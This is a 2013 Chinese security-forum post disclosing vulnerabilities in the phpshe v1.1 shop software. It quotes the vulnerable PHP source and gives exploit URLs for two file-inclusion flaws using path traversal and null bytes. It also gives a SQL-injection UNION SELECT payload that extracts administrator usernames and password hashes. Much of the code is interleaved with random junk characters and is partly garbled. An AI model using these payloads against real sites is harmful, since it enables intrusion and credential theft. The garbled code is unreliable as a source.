找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
返回列表 发新帖
查看: 3152|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/* q" r2 N1 Q7 B
/* Phpshe v1.1 Vulnerability
! m# @5 U3 u% Z/* ========================
0 ?# w* J+ W$ e1 `/* By: : Kn1f3
2 C; Z# N, [# o' p; z/* E-Mail : 681796@qq.com
3 T7 P2 B$ N- Z/*******************************************************/) ~; C. m& p9 k7 z* t
0×00 整体大概参数传输' }! E4 z8 ]2 m* i  a
1 _% ~! o( C- y6 b2 ^8 n
9 j+ a- \$ r! E4 e
7 z1 L0 Q* ^; `1 ~0 T, L
//common.php
4 X# E0 ^% [( n8 V/ X4 L8 t- kif (get_magic_quotes_gpc()) {8 r6 A$ L" s5 b5 S  Y4 X$ \# v- d6 q
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');; ?3 ?6 c0 T' R8 G' Z; y
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
! \3 b( D+ J7 G8 _6 w4 p9 y}
. W$ l( ?5 A# ]0 @else {) X0 t( n4 y( _* @, s' @3 G
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
6 x, [# |1 r' w6 g7 _!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');; T( k4 E* K% m5 G
}' k& }( |4 s, }7 p3 v! ?: z) e) o
session_start();
  Y& K. Q+ I1 h. p  x% j!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');' H) a. W: q! z5 C; v8 r7 X. d+ }
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');6 t" b, q3 C8 {$ c- t& C0 X
' y! g" ?& v  ~6 k
0×01 包含漏洞
. F/ T9 v% g) w& g' @ , ?6 o6 c: Y7 w( _$ S. n
; L1 X4 e; M. c( A* k3 T
//首页文件
. D" ?+ s% ]# n) f- A<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
4 d# s5 L( C: v; y2 }& E- u1 Sinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞$ u2 F! ^' _. m9 j
pe_result();
: }% E; {* ]% h6 N1 ~?>
5 U6 j% g; s7 |% i: j//common 文件 第15行开始& ]. D' G5 g4 M# ~/ z6 R+ L0 i
url路由配置
8 ^8 \  Z, J. f6 F) G2 M9 X( K) Y" w  j$module = $mod = $act = 'index';: n- \, p$ [6 B9 B6 l  E3 r* y7 |
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);; k2 x. E; y) w% P! J: q% u2 w
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);7 g% \: V3 |  [
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
! Z" Z, q% r& K2 K4 P; C4 J//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%004 l/ ?! Y2 X$ d) d  ~- S7 A. n

' @' u& h# t+ [, a3 \( z2 }* [7 G
6 n* k) }9 t* U" {
0×02 搜索注入* s" _. m) p7 G3 N5 u! \7 w

# u) D$ r. P4 K/ v1 s0 h, x<code id="code2">

//product.php文件8 W0 a0 Z0 I: h* X, L; u: g+ M! \
case 'list':+ d" B( V: ?6 N6 Q" ~
$category_id = intval($id);
) M+ |8 z& z$ V$info = $db->pe_select('category', array('category_id'=>$category_id));& u6 }' Q! N1 p
//搜索( u0 A- r3 B# z. G' j
$sqlwhere = " and `product_state` = 1";
' L& q+ y% B6 ^  T+ dpe_lead('hook/category.hook.php');
" _/ c+ k4 y) T  R( d4 nif ($category_id) {
" C6 ^  r" _* G5 l7 }5 Z. \where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
! r+ S$ P" j/ E2 v1 C. P}
% M* ~$ u- ?, G" b$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤3 d# Q6 Y. t4 R" T% r/ U6 Y& }) R
if ($_g_orderby) {
! q# r! M. O( e5 [# w$orderby = explode('_', $_g_orderby);7 s$ O+ p% D( u1 K, l3 b
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
/ i- ~5 U4 L( G) _}
: B  w) ^& n$ }& }5 O6 \4 N3 oelse {9 B( V5 x$ f$ l
$sqlwhere .= " order by `product_id` desc";. G% m- j1 O/ b& x5 O: i
}3 k  M; z2 C2 V: \8 j
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
1 ]# |; f) R8 g! @) D, c//热卖排行
) i: I/ f( x3 }5 X# `3 f) M# N; w$product_hotlist = product_hotlist();) |# Q0 x5 k) s; G+ h* i
//当前路径
, B3 L6 Z' l7 f. ]3 @1 h$nowpath = category_path($category_id);( C4 X: n' \( E$ J7 [+ G: [5 G6 N+ N" l
$seo = pe_seo($info['category_name']);& m! |' {+ O. `' A2 R  R9 ~- U
include(pe_tpl('product_list.html'));
3 ^2 O: z) S5 p; W9 p3 D! X//跟进selectall函数库2 Y" B) g0 R' w/ P  C" z" x
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
4 T% [0 O1 r4 U; a{
& F1 y, s" r8 ~' y# m//处理条件语句
# ?1 H0 O6 }% w/ w- O5 B# v$sqlwhere = $this->_dowhere($where);
/ B( t8 |, L0 S9 D* Dreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);+ F! S0 \0 k! M$ z' W3 F3 C) z1 S
}- ]3 f' S/ s3 `: a# H& T, A2 B4 f
//exp. j$ E) f* O8 u6 P6 U
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
/ o# B6 q$ m6 I# {0 o7 T' N# u

</code>
! w  e5 W) ]5 x3 @ ) d% H9 {3 _, R4 a6 [
0×03 包含漏洞2% i# Z; s- Q6 M* M
+ Z, \4 T+ F) |  q0 Y
<code id="code3">

//order.php

case 'pay':


# e2 t8 V& C$ Q- n, C- ?* D8 D$order_id = pe_dbhold($_g_id);


2 m" q# X( f1 r1 }# r- N$cache_payway = cache::get('payway');


6 ?# Y- b/ O. ?foreach($cache_payway as $k => $v) {

' w  l  m8 G4 ?3 m0 @
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

  h* T" B& n( L0 T. C- U- f5 m
if ($k == 'bank') {


. p; y- J" n; ?( I& }2 p5 ^" O$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

, @# v! s; ^/ L& k1 X1 u" R
}


# f# w# p% t8 j}


2 D5 t9 a3 u# g) W# J6 m1 K% `$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


# F5 E% b5 G! j9 d& l!$order['order_id'] && pe_error('订单号错误...');

( G* {; B# s( q% z# i6 E
if (isset($_p_pesubmit)) {

  A, G0 V# Z) X0 E% M
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

. A$ t! @5 e) M. m5 B: Z, D; i  \4 w
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


7 g( F5 d& \: _7 R9 Qforeach ($info_list as $v) {

7 f8 }" `, @1 v6 Q, r! d1 b
$order['order_name'] .= "{$v['product_name']};";
  e( H0 z4 f: K


( p$ P  O, X9 x8 K7 d  P" e}


: ]4 s. C) M- [( pecho '正在为您连接支付网站,请稍后...';

9 s; m/ }- N  x( m8 C) g
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


- o2 e- M$ r$ O+ ^: q* J3 j; z}//当一切准备好的时候就可以进行"鸡肋包含了"


+ Z. v9 H4 f' a: j/ K  v* eelse {


% X# S5 ?  g$ e9 w6 f& Wpe_error('支付错误...');

0 B& G, r( S: z6 i2 [% s% B' P) C
}


* ?" ~- I9 z+ K7 B  Q. d}

7 k' E- V! m% M5 w
$seo = pe_seo('选择支付方式');


2 ?/ H' {0 R/ R7 n! ~include(pe_tpl('order_pay.html'));

0 ?( j  y2 n8 N
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>: W5 c- }" B1 c+ x9 r& B# Z' x% t
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表